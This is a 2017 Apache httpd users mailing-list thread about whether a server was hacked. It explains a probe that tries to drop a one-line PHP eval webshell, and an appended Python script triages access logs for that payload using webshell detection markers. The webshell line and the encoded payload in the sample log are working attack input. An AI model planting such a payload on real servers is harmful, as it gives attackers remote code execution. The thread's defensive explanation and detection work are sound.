From: Mitchell Krog
Date: Mon, 6 Feb 2017 19:30:48 +0200
To: users@httpd.apache.org
Subject: Re: [users@httpd] am i hacked ?
I see these types of attack strings all the time on Nginx, except Nginx gives a 403. Apache is notoriously bad with security, and giving 200 OK responses makes you **** yourself. A reason I and many other people have switched. User support on this list was also non-existent when I ran into serious SSL problems with 2.4 that until today have been ignored and unanswered.

On 06 Feb 2017 19:21, "Ken Robinson" <kenrbnsn@rbnsn.com> wrote:

> On 2017-02-06 12:08 pm, Lentes, Bernd wrote:
>
>>> The first line is trying to create the file webconfig.txt.php in your
>>> DOCUMENT_ROOT directory, with the contents of the file being:
>>>
>>> <?php eval($_POST[1]);?>
>>>
>>> I didn't decode the remaining lines. I think they're just trying to do the same
>>> thing.
>>
>> Fortunately there is no webconfig.txt.php. And all folders in /srv/www belong to root, and user wwwrun
>> is not allowed to write there.
>
> What seems to be happening here is that your system is being probed for vulnerabilities.
>
> The attacker is sending a payload string to your index.php file in hopes that it will not complain and write the string to the file webconfig.txt.php, which the attacker would then attempt to get to with the real hack in the POSTed contents. Are there any requests to get to that file?
>
> You should make sure you sanitize any input to your index.php and reject anything that's not expected.
>
> Ken
>
> ---------------------------------------------------------------------
> To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
> For additional commands, e-mail: users-help@httpd.apache.org
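Ken's advice comes down to two checks in the access log: did anyone request webconfig.txt.php, and did the server ever answer it with 200; and which requests to index.php carried PHP fragments in the request line. As an added example (not code from the thread or from httpd), here is a small Python triage over constructed Apache combined-log lines; the IP addresses and log lines are made up.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample in Apache combined log format; not lines from the thread.
SAMPLE_LOG = """\
203.0.113.7 - - [06/Feb/2017:12:01:03 +0100] "POST /index.php?c=%3C%3Fphp%20eval%28%24_POST%5B1%5D%29%3B%3F%3E HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [06/Feb/2017:12:01:04 +0100] "GET /webconfig.txt.php HTTP/1.1" 404 209 "-" "Mozilla/5.0"
198.51.100.9 - - [06/Feb/2017:12:05:10 +0100] "GET /index.php HTTP/1.1" 200 1843 "-" "Mozilla/5.0"
203.0.113.7 - - [06/Feb/2017:12:06:00 +0100] "POST /webconfig.txt.php HTTP/1.1" 200 73 "-" "curl/7.47.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
DROPPED_FILE = "webconfig.txt.php"      # file name the probe tries to create
MARKERS = ("<?php", "eval(")            # webshell fragments seen in the payload


def parse_line(line):
    """Return the fields we need from one combined-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    d = m.groupdict()
    d["status"] = int(d["status"])
    return d


def classify(entry):
    """Tag one parsed request; decoding the target catches URL-encoded payloads."""
    tags = []
    decoded = unquote_plus(entry["target"]).lower()
    if any(mk in decoded for mk in MARKERS):
        tags.append("webshell_marker")        # payload shipped in the request line
    if decoded.split("?")[0].endswith("/" + DROPPED_FILE):
        tags.append("dropped_file_probe")     # Ken's question: is anyone asking for it?
        if entry["status"] == 200:
            tags.append("dropped_file_served")  # the file exists and was served: treat as compromise
    return tags


def triage(log_text):
    """Return flagged requests as (ip, method, target, status, tags) in log order."""
    findings = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        tags = classify(entry)
        if tags:
            findings.append((entry["ip"], entry["method"], entry["target"], entry["status"], tags))
    return findings


for finding in triage(SAMPLE_LOG):
    print(*finding)
```

A 404 for webconfig.txt.php is the expected outcome on Bernd's setup (nothing writable under /srv/www); a 200 for that path is the signal to act on, whatever index.php itself returned.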